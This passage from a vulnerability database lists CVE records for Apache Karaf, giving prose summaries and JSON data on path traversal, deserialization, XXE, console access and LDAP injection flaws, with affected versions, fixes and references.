              "other": {
                "content": {
                  "other": "The risk is low as obr:* commands are not very used and the entry is set by user."
                },
                "type": "unknown"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Path traversal flaws",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-01-26T11:10:12.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://karaf.apache.org/security/cve-2022-22932.txt"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Path traversal flaws",
          "workarounds": [
            {
              "lang": "en",
              "value": "Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path."
            }
          ],
          "x_generator": {
            "engine": "Vulnogram 0.0.9"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "ID": "CVE-2022-22932",
              "STATE": "PUBLIC",
              "TITLE": "Path traversal flaws"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "\u003c",
                                "version_name": "Apache Karaf",
                                "version_value": "4.2.15"
                              },
                              {
                                "version_affected": "\u003c",
                                "version_name": "Apache Karaf",
                                "version_value": "4.3.6"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "credit": [
              {
                "lang": "eng",
                "value": "This issue was discovered and reported by GHSL team member Jaroslav Lobacevski"
              }
            ],
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326"
                }
              ]
            },
            "generator": {
              "engine": "Vulnogram 0.0.9"
            },
            "impact": [
              {
                "other": "The risk is low as obr:* commands are not very used and the entry is set by user."
              }
            ],
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Path traversal flaws"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://karaf.apache.org/security/cve-2022-22932.txt",
                  "refsource": "MISC",
                  "url": "https://karaf.apache.org/security/cve-2022-22932.txt"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            },
            "work_around": [
              {
                "lang": "en",
                "value": "Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path."
              }
            ]
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2022-22932",
        "datePublished": "2022-01-26T11:10:12.000Z",
        "dateReserved": "2022-01-10T00:00:00.000Z",
        "dateUpdated": "2024-08-03T03:28:42.479Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-41766 (GCVE-0-2021-41766)

    Vulnerability from cvelistv5 – Published: 2022-01-26 11:10 – Updated: 2024-08-04 03:15
    VLAI
    Title
    Insecure Java Deserialization in Apache Karaf
    Summary
    Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder).
    Severity
    No CVSS data available.
    CWE
    • Insecure Java Deserialization
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: Apache Karaf , < 4.3.6 (custom)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T03:15:29.312Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2021-41766.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.3.6",
                  "status": "affected",
                  "version": "Apache Karaf",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "value": "This issue was reported by Daniel Heyne, Konstantin Samuel and Tobias Neitzel."
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "other": "The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
                },
                "type": "unknown"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Insecure Java Deserialization",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-01-26T11:10:11.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://karaf.apache.org/security/cve-2021-41766.txt"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Insecure Java Deserialization in Apache Karaf",
          "workarounds": [
            {
              "lang": "en",
              "value": "Apache Karaf users should upgrade to 4.3.6 or later as soon as possible, or disable remote access to JMX server."
            }
          ],
          "x_generator": {
            "engine": "Vulnogram 0.0.9"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "ID": "CVE-2021-41766",
              "STATE": "PUBLIC",
              "TITLE": "Insecure Java Deserialization in Apache Karaf"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "\u003c",
                                "version_name": "Apache Karaf",
                                "version_value": "4.3.6"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "credit": [
              {
                "lang": "eng",
                "value": "This issue was reported by Daniel Heyne, Konstantin Samuel and Tobias Neitzel."
              }
            ],
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
                }
              ]
            },
            "generator": {
              "engine": "Vulnogram 0.0.9"
            },
            "impact": [
              {
                "other": "The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
              }
            ],
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Insecure Java Deserialization"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://karaf.apache.org/security/cve-2021-41766.txt",
                  "refsource": "MISC",
                  "url": "https://karaf.apache.org/security/cve-2021-41766.txt"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            },
            "work_around": [
              {
                "lang": "en",
                "value": "Apache Karaf users should upgrade to 4.3.6 or later as soon as possible, or disable remote access to JMX server."
              }
            ]
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2021-41766",
        "datePublished": "2022-01-26T11:10:11.000Z",
        "dateReserved": "2021-09-27T00:00:00.000Z",
        "dateUpdated": "2024-08-04T03:15:29.312Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-11788 (GCVE-0-2018-11788)

    Vulnerability from cvelistv5 – Published: 2019-01-07 16:00 – Updated: 2024-08-05 08:17
    VLAI
    Summary
    Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn't contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases.
    Severity
    No CVSS data available.
    CWE
    • XXE vulnerability
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: Any Apache Karaf version prior to 4.1.7 and 4.2.2
    Create a notification for this product.
    Date Public
    2019-01-07 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:17:09.240Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://karaf.apache.org/security/cve-2018-11788.txt"
              },
              {
                "name": "106479",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/106479"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "Any Apache Karaf version prior to 4.1.7 and 4.2.2"
                }
              ]
            }
          ],
          "datePublic": "2019-01-07T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf provides a features deployer, which allows users to \"hot deploy\" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn\u0027t contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "XXE vulnerability",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-01-09T10:57:01.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://karaf.apache.org/security/cve-2018-11788.txt"
            },
            {
              "name": "106479",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/106479"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "ID": "CVE-2018-11788",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "Any Apache Karaf version prior to 4.1.7 and 4.2.2"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf provides a features deployer, which allows users to \"hot deploy\" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn\u0027t contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "XXE vulnerability"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://karaf.apache.org/security/cve-2018-11788.txt",
                  "refsource": "MISC",
                  "url": "http://karaf.apache.org/security/cve-2018-11788.txt"
                },
                {
                  "name": "106479",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/106479"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2018-11788",
        "datePublished": "2019-01-07T16:00:00.000Z",
        "dateReserved": "2018-06-05T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:17:09.240Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-11786 (GCVE-0-2018-11786)

    Vulnerability from cvelistv5 – Published: 2018-09-18 14:00 – Updated: 2024-09-17 02:12
    VLAI
    Summary
    In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user.
    Severity
    No CVSS data available.
    CWE
    • Process Execution
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: prior to 4.2.0 release
    Create a notification for this product.
    Date Public
    2018-09-18 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:17:09.221Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11786 released for Apache Karaf",
                "tags": [
                  "mailing-list",
                  "x_refsource_MLIST",
                  "x_transferred"
                ],
                "url": "https://lists.apache.org/thread.html/5b7ac762c6bbe77ac5d9389f093fc6dbf196c36d788e3d7629e6c1d9%40%3Cdev.karaf.apache.org%3E"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://issues.apache.org/jira/browse/KARAF-5427"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://karaf.apache.org/security/cve-2018-11786.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "prior to 4.2.0 release"
                }
              ]
            }
          ],
          "datePublic": "2018-09-18T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Process Execution",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-09-18T13:57:02.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11786 released for Apache Karaf",
              "tags": [
                "mailing-list",
                "x_refsource_MLIST"
              ],
              "url": "https://lists.apache.org/thread.html/5b7ac762c6bbe77ac5d9389f093fc6dbf196c36d788e3d7629e6c1d9%40%3Cdev.karaf.apache.org%3E"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://issues.apache.org/jira/browse/KARAF-5427"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://karaf.apache.org/security/cve-2018-11786.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "DATE_PUBLIC": "2018-09-18T00:00:00",
              "ID": "CVE-2018-11786",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "prior to 4.2.0 release"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Process Execution"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11786 released for Apache Karaf",
                  "refsource": "MLIST",
                  "url": "https://lists.apache.org/thread.html/5b7ac762c6bbe77ac5d9389f093fc6dbf196c36d788e3d7629e6c1d9@%3Cdev.karaf.apache.org%3E"
                },
                {
                  "name": "https://issues.apache.org/jira/browse/KARAF-5427",
                  "refsource": "CONFIRM",
                  "url": "https://issues.apache.org/jira/browse/KARAF-5427"
                },
                {
                  "name": "http://karaf.apache.org/security/cve-2018-11786.txt",
                  "refsource": "CONFIRM",
                  "url": "http://karaf.apache.org/security/cve-2018-11786.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2018-11786",
        "datePublished": "2018-09-18T14:00:00.000Z",
        "dateReserved": "2018-06-05T00:00:00.000Z",
        "dateUpdated": "2024-09-17T02:12:17.084Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-11787 (GCVE-0-2018-11787)

    Vulnerability from cvelistv5 – Published: 2018-09-18 14:00 – Updated: 2024-09-17 02:16
    VLAI
    Summary
    In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised.
    Severity
    No CVSS data available.
    CWE
    • Unsecure Access
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: prior to 3.0.9
    Affected: 4.0.x prior to 4.0.9
    Affected: 4.1.x prior to 4.1.1
    Create a notification for this product.
    Date Public
    2018-09-18 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:17:09.210Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://issues.apache.org/jira/browse/KARAF-4993"
              },
              {
                "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11787 released for Apache Karaf",
                "tags": [
                  "mailing-list",
                  "x_refsource_MLIST",
                  "x_transferred"
                ],
                "url": "https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c%40%3Cdev.karaf.apache.org%3E"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://karaf.apache.org/security/cve-2018-11787.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "prior to 3.0.9"
                },
                {
                  "status": "affected",
                  "version": "4.0.x prior to 4.0.9"
                },
                {
                  "status": "affected",
                  "version": "4.1.x prior to 4.1.1"
                }
              ]
            }
          ],
          "datePublic": "2018-09-18T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Unsecure Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-09-18T13:57:02.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://issues.apache.org/jira/browse/KARAF-4993"
            },
            {
              "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11787 released for Apache Karaf",
              "tags": [
                "mailing-list",
                "x_refsource_MLIST"
              ],
              "url": "https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c%40%3Cdev.karaf.apache.org%3E"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://karaf.apache.org/security/cve-2018-11787.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "DATE_PUBLIC": "2018-09-18T00:00:00",
              "ID": "CVE-2018-11787",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "prior to 3.0.9"
                              },
                              {
                                "version_value": "4.0.x prior to 4.0.9"
                              },
                              {
                                "version_value": "4.1.x prior to 4.1.1"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Unsecure Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://issues.apache.org/jira/browse/KARAF-4993",
                  "refsource": "CONFIRM",
                  "url": "https://issues.apache.org/jira/browse/KARAF-4993"
                },
                {
                  "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11787 released for Apache Karaf",
                  "refsource": "MLIST",
                  "url": "https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c@%3Cdev.karaf.apache.org%3E"
                },
                {
                  "name": "http://karaf.apache.org/security/cve-2018-11787.txt",
                  "refsource": "CONFIRM",
                  "url": "http://karaf.apache.org/security/cve-2018-11787.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2018-11787",
        "datePublished": "2018-09-18T14:00:00.000Z",
        "dateReserved": "2018-06-05T00:00:00.000Z",
        "dateUpdated": "2024-09-17T02:16:58.807Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2016-8750 (GCVE-0-2016-8750)

    Vulnerability from cvelistv5 – Published: 2018-02-19 15:00 – Updated: 2024-09-17 00:36
    VLAI
    Summary
    Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encoding usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service.
    Severity
    No CVSS data available.
    CWE
    • Injection Attack
    References
    URL Tags
    https://access.redhat.com/errata/RHSA-2018:1322 vendor-advisoryx_refsource_REDHAT
    https://karaf.apache.org/security/cve-2016-8750.txt x_refsource_CONFIRM
    http://www.securityfocus.com/bid/103098 vdb-entryx_refsource_BID
    Impacted products
    Date Public
    2017-12-04 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T02:35:00.163Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "RHSA-2018:1322",
                "tags": [
                  "vendor-advisory",
                  "x_refsource_REDHAT",
                  "x_transferred"
                ],
                "url": "https://access.redhat.com/errata/RHSA-2018:1322"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2016-8750.txt"
              },
              {
                "name": "103098",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/103098"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "prior to 4.0.8"
                }
              ]
            }
          ],
          "datePublic": "2017-12-04T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encoding usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Injection Attack",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-05-04T09:57:01.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "name": "RHSA-2018:1322",
              "tags": [
                "vendor-advisory",
                "x_refsource_REDHAT"
              ],
              "url": "https://access.redhat.com/errata/RHSA-2018:1322"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://karaf.apache.org/security/cve-2016-8750.txt"
            },
            {
              "name": "103098",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
